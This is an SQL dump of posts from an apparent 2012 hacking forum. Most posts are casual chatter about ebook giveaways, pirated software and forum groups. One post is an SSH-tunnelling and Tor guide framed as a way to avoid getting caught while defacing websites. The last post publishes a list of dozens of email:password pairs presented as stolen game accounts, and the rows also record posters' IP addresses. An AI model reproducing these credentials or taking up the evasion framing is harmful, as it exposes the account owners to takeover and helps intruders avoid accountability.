VALUES('2004', '425', '1939', '61', 'RE: Huge SEing Giveaway [50+]', '0', '9', 'p420', '1347677265', 'Please provide a Virus Scan. Also any screenshots to show you have the ebooks? I just want to be on the safe side.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '42506261afb219eedbd5f98aaa8433a3', '0', '0'); INSERT INTO mybb_posts VALUES('2005', '424', '1938', '61', 'RE: Money Making eBooks', '0', '9', 'p420', '1347677315', 'Please provide a Virus Scan. Also any screenshots to show you have the ebooks?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '10f7dd3d19454321ee77605f8b1d470b', '0', '0'); INSERT INTO mybb_posts VALUES('2006', '427', '1941', '61', 'RE: Photoshop CS6 Extended 64 Bit', '0', '9', 'p420', '1347677346', 'I already have PS but thanks anyway.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2d57d1f094390a2545d89bacd38ec704', '0', '0'); INSERT INTO mybb_posts VALUES('2007', '434', '1981', '61', 'RE: Money Making eBook', '0', '9', 'p420', '1347677381', 'Cross posting or you created a different thread?\n\nhttp://l33thacking.net/thread-424.html', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4ecb22821d8e139b3b78311ae633b334', '0', '0'); INSERT INTO mybb_posts VALUES('2008', '433', '1980', '61', 'RE: eBooks Giveaway', '0', '9', 'p420', '1347677433', '[quote=\'iTzIpod\' pid=\'1980\' dateline=\'1347664544\']\r\n[quote=\'t3h jok3r\' pid=\'1977\' dateline=\'1347664320\']\r\nWhy not take a screenshot of some of them?\r\n[/quote]\r\n\r\nI don\'t own them.\r\n[/quote]\r\n\r\nI\'m sure Jok3r meant to take a screenshot of your giveaway folder.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '82f3fca8bfe26d32d76c9579e28898b0', '0', '0'); INSERT INTO mybb_posts VALUES('2009', '432', '1968', '61', 'RE: 145+ eBooks Giveaway', '0', '9', 'p420', '1347677470', 'Are they all autopilot? \nThanks for the ebooks.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '62e194543f171fd4d3a3c1f7a5f134a4', '0', '0'); INSERT INTO mybb_posts VALUES('2010', '437', '1995', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347677722', 'Clicking on all links.\nRight now. I suggest you a Website Viewer on Adf.ly links. Not sure if it works but it should?\n\nAlso, the first link leads to L33thacking.com even though we switched domains to L33thacking.net', '24.212.197.164', '416597412', '1', '0', '82', '1347677786', '1', 'eff4d5f215e27b38f7fdec55b155c666', '0', '1347677786'); INSERT INTO mybb_posts VALUES('2011', '353', '1654', '13', 'RE: [Complete Guide]*How to crack All Sites Hosting With Apex!*[Complete Guide]', '0', '9', 'p420', '1347677746', 'This is nice unique tutorial.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '10ae5b598bc02bb1bc4110c67291d015', '0', '0'); INSERT INTO mybb_posts VALUES('2012', '438', '0', '13', 'Stay Anonymous (Secure) online 2012 Using SSH Tunneling', '0', '9', 'p420', '1347677781', 'Hi all users, I know most of you are scare before hacking/defacing a website without taking precautions. Because most of you may not be having a good VPN which is paid and secure enough to do illegal stuffs and if you user free VPN you\'ll easily get caught. So today we will teach you how to stay completely secure (anonymous) without using any VPN. So lets get started. \r\n\r\nHere is some drawbacks using free VPN : \r\n\r\nThey are slow and contain ads in most of the cases.\r\nThe provide limited number of proxies.\r\nThey are insecure as they store logs.\r\nLogs are easily Traceable.\r\nThey are not reliable because even when they say they do not store logs,they do it\r\n\r\nTool that we\'ll use is this TUT :\r\n\r\nTOR Browser Download [url=https://www.torproject.org/download/download]Here[/url]\r\nPuTTY Download [url=http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe]Here[/url]\r\n\r\nNow open PuTTY and in the category, choose Session and fill the boxes as mentioned below :\r\n\r\nHost Name : shellmix.com\r\n\r\nPort : 30\r\n\r\nConnection Type : SSH\r\n[img]http://2.bp.blogspot.com/-W8WUZ3lRpxw/UEDWt8HT_qI/AAAAAAAAFG4/QfpEQA0qCfE/s1600/Stay-Anonymous-And-Secure-by-SSH-Tunneling-+-TOR-(NOOB-Friendly)-1.gif[/img]\r\n\r\nAnd Click Open, a black window will appear.Enter the Username and password as \"newuser\" (Password appears blank but its typed).\r\n\r\n1. Now enter a Login name and a password.\r\n\r\n2. Enter another password For MySQL Database.\r\n\r\n3. Enter Email Address.\r\n\r\n4. Choose Editor and Enter pico.\r\n\r\nLanguage : us\r\nVhost : shell\r\nHDD : Enter hdd1 or hdd2\r\n\r\nNow press Enter to Continue.Now your shell account is ready, make sure you remember the username and that password you created.\r\n\r\n\r\nSSH TUNNELING\r\n\r\n\r\nNow we\'re going to do SSH tunneling, reopen the PuTTY and follow the steps below to make it work :\r\n\r\nHost : shellmix.com.\r\nPort : 22.\r\nNow in category on the left,choose SSH.\r\nExpand it and select Tunnel.\r\nDestination : Dynamic.\r\nPort : Any random port. (Example : 4545)\r\n\r\nClick Add and finally click on Open. Enter the Login name and Password that you created earlier and leave this window open.\r\n\r\n[img]http://3.bp.blogspot.com/-CER7EKcO7Vw/UEDfHYuWoyI/AAAAAAAAFHw/Uh2GKHpWq7o/s1600/Stay+Anonymous+And+Secure+by+SSH+Tunneling+%252B+TOR+%2528NOOB+Friendly%2529+2.gif[/img]\r\n\r\nNow open TOR\r\n\r\n1. Click Firefox > Options > Advanced > Network > Settings\r\n2. Click Manual Proxy Configuration\r\n\r\nSocks Host : 127.0.0.1\r\nPort : 4545 (The port you used earlier in PuTTY)\r\n\r\n\r\n3. Click on OK.\r\n \r\nSSH Tunnel Is Ready. Go to [url]http://www.ip2location.com/[/url] and verify your fake IP\r\n\r\nStay Anonymous', '72.231.24.165', '1223104677', '0', '0', '1', '1347677816', '1', '78010452e84957e3a7e427c09236e9bb', '0', '1347677816'); INSERT INTO mybb_posts VALUES('2013', '412', '1997', '7', 'RE: 400th Thread', '0', '82', 'iTzIpod', '1347677907', '[quote=\'t3h jok3r\' pid=\'1997\' dateline=\'1347676741\']\n[quote=\'iTzIpod\' pid=\'1919\' dateline=\'1347628172\']\n[quote=\'t3h jok3r\' pid=\'1906\' dateline=\'1347593867\']\nCongratz on the 400 threads LH and 400 posts iTzIpod, the more activity we have the more backlinks we will have which means more HQ members.\n[/quote]\n\nThanks! :D\n\n@Apathy, Gratz on 100 posts :3\n[/quote]\n\nYou made me lol. We are talking about reaching a huge milestone which is 400 threads and you congratulated Apathy for 100 posts. Nothing against anyone, just saying it\'s funny.\n[/quote]\n\nNXK is at 99 posts at the moment :3\n\n-Waits-', '24.212.197.164', '416597412', '1', '0', '82', '1347677924', '1', 'cf991d707df42b4ea5074520a0de673e', '0', '1347677924'); INSERT INTO mybb_posts VALUES('2014', '378', '1996', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347677963', '[quote=\'t3h jok3r\' pid=\'1996\' dateline=\'1347676666\']\r\nLuckily all my new teachers are awesome but my new schools building is kinda small, can\'t believe it\'s a popular school.\r\n[/quote]\r\n\r\nWas it rebuilt?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5c8ac40a79712cea193012952151c954', '0', '0'); INSERT INTO mybb_posts VALUES('2015', '422', '2003', '19', 'RE: [Read] Announcement', '0', '82', 'iTzIpod', '1347678073', '[quote=\'p420\' pid=\'2003\' dateline=\'1347677213\']\r\nYou made a lot of contributions in this group, by the way this is an invite only group right?\r\n[/quote]\r\n\r\nInvite Only/Join Only.\r\n\r\nIf you request to join, I will decide either Yes or No to accept your request.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0faf308d49226250829ec16a46575e47', '0', '0'); INSERT INTO mybb_posts VALUES('2016', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1347678132', '@Lonnie, no problem. =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2dc92d9d43ea7768b684cb1444044124', '0', '0'); INSERT INTO mybb_posts VALUES('2017', '424', '1938', '61', 'RE: Money Making eBooks', '0', '82', 'iTzIpod', '1347678166', 'Will post screenshots and virus scans soon.\n\nHopefully tomorrow.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '595499a5a31eb1ac46f627575b16306a', '0', '0'); INSERT INTO mybb_posts VALUES('2018', '432', '2009', '61', 'RE: 145+ eBooks Giveaway', '0', '82', 'iTzIpod', '1347678235', '[quote=\'p420\' pid=\'2009\' dateline=\'1347677470\']\r\nAre they all autopilot? \r\nThanks for the ebooks.\r\n[/quote]\r\n\r\nNo. They have a few eBooks that are autopilot and some are manual.\r\n\r\nNo Problem.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9faa732d58e0f7b34cb37ee95f0e3f5e', '0', '0'); INSERT INTO mybb_posts VALUES('2019', '437', '1995', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347678869', 'Website Viewer? And fixed the link to L33THacking.net', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '07296c6ef8fe9c14f5d8974590217336', '0', '0'); INSERT INTO mybb_posts VALUES('2020', '437', '2019', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347679116', '[quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\']\r\nWebsite Viewer? And fixed the link to L33THacking.net\r\n[/quote]\r\n\r\nAs long as it\'s an adf.ly link and someone clicks on it, you still get money. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd94e511192c17f78dd08000b0409bf2f', '0', '0'); INSERT INTO mybb_posts VALUES('2021', '430', '1951', '9', 'RE: ? ?[7.99]How to make Money Online![2 Methods] Earn +500$ A month|Autobuy![Vouch]', '0', '1', 't3h jok3r', '1347679539', '[font=Tahoma][align=center][size=x-large][b][color=#32CD32]Ebook review by Jok3r[/color][/b][/size][/align][/font]\n\n[font=Tahoma][size=large][b][color=#32CD32]Quality of Information (3/5)[/color][/b][/size][/font]\n\nWell-explained ebook. This ebook contains two different monetizing techniques, in fact we even have a sub-forum for one of the technique. His ebook explains even contains a video on how to do one of the method and you can get full support on LH on the technique so it\'s safe to buy this ebook. The second method is kinda unique but seems high rewarding. \n\n[font=Tahoma][size=large][b][color=#32CD32]Ease (5/5)[/color][/b][/size][/font]\n\nBoth methods are easy, just require some patience. The first method is public and kinda saturated but you can earn shit loads of money. I would recommend 15+ to look forward to buy this ebook.\n\n[font=Tahoma][size=large][b][color=#32CD32]Layout (5/5)[/color][/b][/size][/font]\n\nFont and text size are easy to see and read, contains steps including pictures, includes author email for inquiries, white background but short yet well-explained ebook.\n\nThis is a review of the ebook, we do not endorse or vouch for this ebook in any way. This my opinion and may vary with others.', '72.231.24.165', '1223104677', '1', '0', '1', '1347679608', '1', '8f7764b017827425ba2ab90f1e7106cb', '0', '1347679608'); INSERT INTO mybb_posts VALUES('2022', '38', '1994', '16', 'RE: [tut] How to lie like a pro', '0', '1', 't3h jok3r', '1347680167', '[quote=\'iTzIpod\' pid=\'1994\' dateline=\'1347675467\']\r\n[quote=\'t3h jok3r\' pid=\'1990\' dateline=\'1347675210\']\r\n[quote=\'iTzIpod\' pid=\'1856\' dateline=\'1347493805\']\r\nCool tutorial :3\r\n\r\nI\'m not a good liar.. :/\r\n[/quote]\r\n\r\nI use to be a good liar, I could look into eyes and lie.\r\n[/quote]\r\nLOL I can\'t even master that..\r\n[/quote]\r\nIf you read kevin mitnicks book and learn how to think fast then you would be able to lie like I do.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'aeeb835599b878e31b005fd925ca38aa', '0', '0'); INSERT INTO mybb_posts VALUES('2023', '38', '2022', '16', 'RE: [tut] How to lie like a pro', '0', '82', 'iTzIpod', '1347680592', '[quote=\'t3h jok3r\' pid=\'2022\' dateline=\'1347680167\']\r\n[quote=\'iTzIpod\' pid=\'1994\' dateline=\'1347675467\']\r\n[quote=\'t3h jok3r\' pid=\'1990\' dateline=\'1347675210\']\r\n[quote=\'iTzIpod\' pid=\'1856\' dateline=\'1347493805\']\r\nCool tutorial :3\r\n\r\nI\'m not a good liar.. :/\r\n[/quote]\r\n\r\nI use to be a good liar, I could look into eyes and lie.\r\n[/quote]\r\nLOL I can\'t even master that..\r\n[/quote]\r\nIf you read kevin mitnicks book and learn how to think fast then you would be able to lie like I do.\r\n[/quote]\r\n\r\nNever heard of it before. Will Google Search it sometime.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f48dbb8e920cfefa923bf140cdc89397', '0', '0'); INSERT INTO mybb_posts VALUES('2024', '397', '1859', '42', 'RE: 11th Anniversary of 9/11', '0', '1', 't3h jok3r', '1347680684', 'RIP on whoever died in the incident that took place on 9/11\n\nOff topic: ROFLOL, no one commented on this thread. How the fuck is this possible, I did comment before because I was too busy and thought this topic would be busy without me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dbdf97b96d667720b3d5c7f71ce1222b', '0', '0'); INSERT INTO mybb_posts VALUES('2025', '164', '1334', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1347680788', '[quote=\'Thunder™\' pid=\'1334\' dateline=\'1346260857\']\r\nThis Forums have already many active members and activity is good\r\nI hope i will contribute more :).\r\n[/quote]\r\n\r\nThanks and good luck.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '776cccfbf6dec215f9e159f406d01514', '0', '0'); INSERT INTO mybb_posts VALUES('2026', '368', '1714', '47', 'RE: 5 free @l33thacking.net forwarders', '0', '5', 'Timmy', '1347681035', 'Nice contest i would have gone for it but i don\'t sign up on sites so much so i don\'t need a custom LH forwarder but this does not mean that i will not be active', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5e9b77ec7740d329eca3af05e1e6d80a', '0', '0'); INSERT INTO mybb_posts VALUES('2027', '406', '1886', '30', 'RE: Skype Fake Quote Generator', '0', '5', 'Timmy', '1347681074', 'Useful for scamming people :D\n\nJK, thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3be808fc8f7873de1d01a0efe7598cfc', '0', '0'); INSERT INTO mybb_posts VALUES('2028', '426', '1940', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '5', 'Timmy', '1347681105', 'Link is down. Thanks tho and can you reupload?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f183025f1252755731f2deadf08c08ef', '0', '0'); INSERT INTO mybb_posts VALUES('2029', '406', '2027', '30', 'RE: Skype Fake Quote Generator', '0', '82', 'iTzIpod', '1347681912', '[quote=\'Timmy\' pid=\'2027\' dateline=\'1347681074\']\r\nUseful for scamming people :D\r\n\r\nJK, thanks.\r\n[/quote]\r\n\r\nNo problem! =] Enjoy!~/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0f8c46df07d0050069fd7bece55fdb66', '0', '0'); INSERT INTO mybb_posts VALUES('2030', '426', '1940', '30', 'RE: [100% Virus Free] Photoshop CS5', '0', '82', 'iTzIpod', '1347682478', 'I will soon. Please be patient.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '193860444b74e20fdfc304f670f87aff', '0', '0'); INSERT INTO mybb_posts VALUES('2031', '397', '2024', '42', 'RE: 11th Anniversary of 9/11', '0', '82', 'iTzIpod', '1347682956', '[quote=\'t3h jok3r\' pid=\'2024\' dateline=\'1347680684\']\r\nRIP on whoever died in the incident that took place on 9/11\r\n\r\nOff topic: [b]ROFLOL, no one commented on this thread. How the fuck is this possible, I did comment before because I was too busy and thought this topic would be busy without me.[/b]\r\n[/quote]\r\n\r\nI find this sadder than 9/11.... :(', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2a29d3e87a4b3ac4d1db6cc8882badf8', '0', '0'); INSERT INTO mybb_posts VALUES('2032', '397', '1859', '42', 'RE: 11th Anniversary of 9/11', '0', '55', 'Baws', '1347683868', 'It sucks when people feel bad when 2000 people die in US, but not the millions around the world.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '411f519492f4a0facd17245b40565670', '0', '0'); INSERT INTO mybb_posts VALUES('2033', '420', '1927', '49', 'RE: [Suggestion] Mods/+ Can Edit Threads without the duration thing', '0', '1', 't3h jok3r', '1347683927', 'Mods, Staff and Elite have no time limit anymore.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '785ca1410e475aa3bd19342fe452ba36', '0', '0'); INSERT INTO mybb_posts VALUES('2034', '378', '1809', '7', 'RE: How is school for you?', '0', '55', 'Baws', '1347683949', '[quote=\'iTzIpod\' pid=\'1809\' dateline=\'1347392591\']\r\n[quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\']\r\nLol\r\nYou have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland..\r\nYou have to do a pretty hard test to join my school. So I go to school with lots of brainy kids -.-\r\n[/quote]\r\n\r\nI still go to elementary school.\r\nGrade 8.\r\n[/quote]\r\n\r\nAre you kidding me? LOL\r\n\r\nMy school\'s fine I guess, I got a quiz first week of school, and book work! Woot?\r\n#Juniors year', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '89b447775b3e65caafe1c214b2aff3f7', '0', '0'); INSERT INTO mybb_posts VALUES('2035', '437', '2020', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347683967', '[quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\']\r\n[quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\']\r\nWebsite Viewer? And fixed the link to L33THacking.net\r\n[/quote]\r\n\r\nAs long as it\'s an adf.ly link and someone clicks on it, you still get money. :p\r\n[/quote]\r\n\r\n\r\nI have no idea what you are talking about.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7ed3e406384fb685fa0586796cae27aa', '0', '0'); INSERT INTO mybb_posts VALUES('2036', '412', '1892', '7', 'RE: 400th Thread', '0', '1', 't3h jok3r', '1347684295', 'I got an idea, why not make this a milestone thread? \n\n[b]Change of mind[/b]\n\nIt\'s better to create a new thread for each milestone at the moment, this will increase our thread count and we will have more to discuss about.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b09e001730e96f2b158d0d1c948c7cf', '0', '0'); INSERT INTO mybb_posts VALUES('2038', '64', '151', '23', 'RE: Securing your website', '0', '7', 'Romdu62', '1347684399', 'I like the layout and text colors. Ill use this for my website.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4f42d117f44f9ddcb5b17cfc7cfeac6e', '0', '0'); INSERT INTO mybb_posts VALUES('2039', '345', '1983', '63', 'RE: Need userbar! [Gamers]', '0', '7', 'Romdu62', '1347684508', '[quote=\'NXK\' pid=\'1983\' dateline=\'1347665593\']\r\nI don\'t know it\'s just the colors/ the font. I\'m not a fan of really dark things.\r\n[/quote]\r\n\r\n**Cough Cough** You have a black bg in your avatar ;)\r\n\r\nI think dark is better because white would hurt oru eyes', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'd3555c5da1d31a0df7053d2f4e455293', '0', '0'); INSERT INTO mybb_posts VALUES('2040', '437', '1995', '3', 'RE: Help keep LH up', '0', '53', 'sirchamp', '1347694522', 'I clicked all the links. But you wont earn much money with adf.ly . If you need money I wouldnt mind ads.', '188.155.56.90', '-1130678182', '1', '0', '53', '1347694556', '1', 'd7c70f34e8d361eccfc14451dc8b2b2d', '0', '1347694556'); INSERT INTO mybb_posts VALUES('2041', '38', '98', '16', 'RE: [tut] How to lie like a pro', '0', '53', 'sirchamp', '1347694633', 'I have that Book. Kevin Mitnick The Art of Deception.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c0acf0e33805f4caad3746940921f0af', '0', '0'); INSERT INTO mybb_posts VALUES('2042', '422', '1936', '19', 'RE: [Read] Announcement', '0', '62', 'R?????zo?', '1347702452', 'Thanks for doing this giveaways, it should be one of the rules of this group to NOT share anywhere else outside the group.', '95.69.114.198', '1598386886', '1', '0', '0', '0', '1', 'c68745ce7192cba5c37fb4dbf90574ed', '0', '0'); INSERT INTO mybb_posts VALUES('2043', '385', '1768', '19', 'RE: Discussion', '0', '62', 'R?????zo?', '1347703732', 'I don\'t want you to leave either, you are a really good member in my opinion, I\'ve read somewhere that you are busy with school but you should stick here, school comes first of course but even if your not active everyday , I\'m sure you can find time to leave a post or two sometime. And now that we just become friendly :P I don\'t want you to leave.\nWell it\'s your call anyways, but good luck to whatever your decision is :)', '95.69.114.198', '1598386886', '1', '0', '62', '1347703765', '1', '009b1511fb73a7c48d49422645025df0', '0', '1347703765'); INSERT INTO mybb_posts VALUES('2044', '431', '1979', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347706600', '[quote=\'t3h jok3r\' pid=\'1979\' dateline=\'1347664425\']\nSize: Dunno\nColour Scheme: Black, Red, Grey, Silver or white\nRender/Image: http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png\nText: Admin\nAnything else: This is going to be the admin userbar.\n[/quote]\n\n[img]http://i.imgur.com/H8PtH.png[/img]\n\nHope you like it.\nLet me know if you need anything changed.\n\n[hr]\n[quote=\'iTzIpod\' pid=\'1960\' dateline=\'1347650771\']\n\n1. Thanks for contributing to Unique. =]\nBut I\'m fine for now. =]\n[/quote]\n\nHeres your request, hope you like it:\n\n[img]http://i.imgur.com/cEFV6.gif[/img]', '89.214.255.154', '1507262362', '1', '0', '62', '1347709701', '1', '19ad7b6a70f16eaca8dc0b9b67c13d22', '0', '1347709701'); INSERT INTO mybb_posts VALUES('2045', '397', '1859', '42', 'RE: 11th Anniversary of 9/11', '0', '82', 'iTzIpod', '1347711217', '9/11 = 11 years ago = 2000+ people die = Breaking News\n\nAfrica = 10000+ people die from starvation... :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ed1a29afbf9901e725f510cdbb2536b9', '0', '0'); INSERT INTO mybb_posts VALUES('2046', '437', '2035', '3', 'RE: Help keep LH up', '0', '82', 'iTzIpod', '1347711336', '[quote=\'t3h jok3r\' pid=\'2035\' dateline=\'1347683967\']\r\n[quote=\'iTzIpod\' pid=\'2020\' dateline=\'1347679116\']\r\n[quote=\'t3h jok3r\' pid=\'2019\' dateline=\'1347678869\']\r\nWebsite Viewer? And fixed the link to L33THacking.net\r\n[/quote]\r\n\r\nAs long as it\'s an adf.ly link and someone clicks on it, you still get money. :p\r\n[/quote]\r\n\r\n\r\nI have no idea what you are talking about.\r\n[/quote]\r\n\r\nI meant. L33thacking.com was still an Adf.ly link. And so if someone clicks on it, you can still get money. O_o\r\nBut you changed it to L33thacking.net now so it doesn\'t matter.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43e736802e3f34d317615ce90796fc52', '0', '0'); INSERT INTO mybb_posts VALUES('2047', '431', '2044', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '82', 'iTzIpod', '1347711463', '[quote=\'R?????zo?\' pid=\'2044\' dateline=\'1347706600\']\r\n[quote=\'t3h jok3r\' pid=\'1979\' dateline=\'1347664425\']\r\nSize: Dunno\r\nColour Scheme: Black, Red, Grey, Silver or white\r\nRender/Image: http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png\r\nText: Admin\r\nAnything else: This is going to be the admin userbar.\r\n[/quote]\r\n\r\n[img]http://i.imgur.com/H8PtH.png[/img]\r\n\r\nHope you like it.\r\nLet me know if you need anything changed.\r\n\r\n[hr]\r\n[quote=\'iTzIpod\' pid=\'1960\' dateline=\'1347650771\']\r\n\r\n1. Thanks for contributing to Unique. =]\r\nBut I\'m fine for now. =]\r\n[/quote]\r\n\r\nHeres your request, hope you like it:\r\n\r\n[img]http://i.imgur.com/cEFV6.gif[/img]\r\n[/quote]\r\n\r\nI can live with it. I don\'t really dig the font. But good job still. Thanks! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bdb255695d9fe46db73abf0f050a75c8', '0', '0'); INSERT INTO mybb_posts VALUES('2048', '434', '1981', '61', 'RE: Money Making eBook', '0', '82', 'iTzIpod', '1347711613', 'It\'s a different thread. \n\nThis is 1 eBook. And the other thread was like 5+ I forgot how much...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '26d23c1119fe10a5649df562b53335c2', '0', '0'); INSERT INTO mybb_posts VALUES('2049', '412', '2036', '7', 'RE: 400th Thread', '0', '82', 'iTzIpod', '1347711707', '[quote=\'t3h jok3r\' pid=\'2036\' dateline=\'1347684295\']\r\nI got an idea, why not make this a milestone thread? \r\n\r\n[b]Change of mind[/b]\r\n\r\nIt\'s better to create a new thread for each milestone at the moment, this will increase our thread count and we will have more to discuss about.\r\n[/quote]\r\n\r\nWe could make a section for that too? Make it a subforum in the Off Topic Section*.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd78cd121dddbd7f0e884fee304c19cdb', '0', '0'); INSERT INTO mybb_posts VALUES('2050', '378', '2034', '7', 'RE: How is school for you?', '0', '82', 'iTzIpod', '1347711866', '[quote=\'Baws\' pid=\'2034\' dateline=\'1347683949\']\r\n[quote=\'iTzIpod\' pid=\'1809\' dateline=\'1347392591\']\r\n[quote=\'sirchamp\' pid=\'1802\' dateline=\'1347376465\']\r\nLol\r\nYou have only one teacher?? I have for every subject a different teacher. Im going to a place called the gymnasium. A gymnasium is a school for the like 20% most clever kids of Switzerland. Yeahhh Switzerland..\r\nYou have to do a pretty hard test to join my school. So I go to school with lots of brainy kids -.-\r\n[/quote]\r\n\r\nI still go to elementary school.\r\nGrade 8.\r\n[/quote]\r\n\r\n[b]Are you kidding me? LOL[/b]\r\n\r\nMy school\'s fine I guess, I got a quiz first week of school, and book work! Woot?\r\n#Juniors year\r\n[/quote]\r\n\r\nIs there something wrong?\r\n\r\n\r\nI got 3 quizzes on the 2nd week of school. And 1 assignment on the first. And another one on the 2nd. Just finishing up now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fa00ca1ec1876ddc2c3fcad596c38f0b', '0', '0'); INSERT INTO mybb_posts VALUES('2051', '439', '0', '58', 'Unique - Recruitment', '0', '82', 'iTzIpod', '1347712290', 'This is Unique\'s Recruitment thread. \nPlease use the format below and post your application. \nDon\'t PM me about it or else I will deny it.\nAlso, don\'t request a Join Request because I will deny those too.\n\n[b]Requirements[/b]\n[list]\n[*] Must have 15+ posts\n[*] Must have at least 3 threads (At least 1 tutorial, guide, ebook etc)\n[*] Must be HQ & Unique\n[*] Must contribute a lot to L33tHacking\n[/list]\n\n[b]Group Userbar[/b]\n[img]http://i.imgur.com/ceRsZ.gif[/img]\n\n[b]Forum Icon[/b]\n[img]http://l33thacking.net/uploads/ficons/CxrW3.png[/img]\n\n[b]Unique Group Application[/b]\n\n[code]\n[b]Name:[/b] \n[b]Age:[/b] \n[b]Username: [/b]\n[b]Profile Link:[/b] \n[b]Are you Unique?:[/b] \n[b]Are you HQ?:[/b] \n[b]Why do you wish to get into our group?:[/b] \n[b]What will you do to contribute to Unique?:[/b] \n[/code]', '24.212.197.164', '416597412', '1', '0', '82', '1348779632', '1', '903a7d705ea73a6e6ebbaf01d86a5418', '0', '1348779632'); INSERT INTO mybb_posts VALUES('2052', '440', '0', '74', '1300+ Runescape Accounts', '0', '82', 'iTzIpod', '1347712831', 'I found these accounts online. So if the password was changed, note that it was online. And could\'ve been used long time ago or something. I don\'t own these accounts.\r\n\r\n[spoiler][code]\r\ndaniel525@hotmail.co.uk:dandanwww.warmingglobal@ymail.com:arber\r\nfirewinn@live.com:654654\r\nsilver-drag0ns@hotmail.com:deslauriers\r\nhabelinc@gmail.com:brooks\r\nskateboard_dude_18@hotmail.com:peuvent\r\nscrach17@gmail.com:tripwire\r\nianizcool@gmail.com:fruity\r\ndamoski_98@hotmail.com:muller\r\nldyankee@comcast.net:cat123\r\npaulvorobyev@gmail.com:winwin\r\nthesaltonater@gmail.com:frankie\r\nkopec.JB@seznam.cz:brenda\r\ni_r_bmx@hotmail.com:vodafone\r\nmoultondustin@hotmail.com:snoots\r\npartymalich@aol.com:awesome\r\ncalluml_24@live.com:twister\r\nmonteirocod2@hotmail.com:galego\r\nihatetheman2@yahoo.com:polos\r\nimanoob4life2010@hotmail.com:almost\r\nkarapetazarian@yahoo.com:mikael\r\ndevinincorp@yahoo.com:brock\r\ncuvie@hotmail.com:autoplay\r\nkoltenakr@yahoo.com:kolten\r\nmarlor09@hotmail.co.uk:letmein\r\nstrbloods@hotmail.com:handsom\r\nstrbloods@hotmail.com:handsom\r\njacoterry@yahoo.com:050594\r\nsabzeman@gmail.com:mehrdad\r\nraifieldc4@aim.com:orlando\r\neelionkova@hotmail.com:kokko\r\nnick_space_rocks@hotmail.com:bigred\r\nkissup@gmx.us:sphere\r\nloganchad28@yahoo.com:12354\r\nbombtoss@craiglondon.com:mithra---start of other guys log\r\ntierny 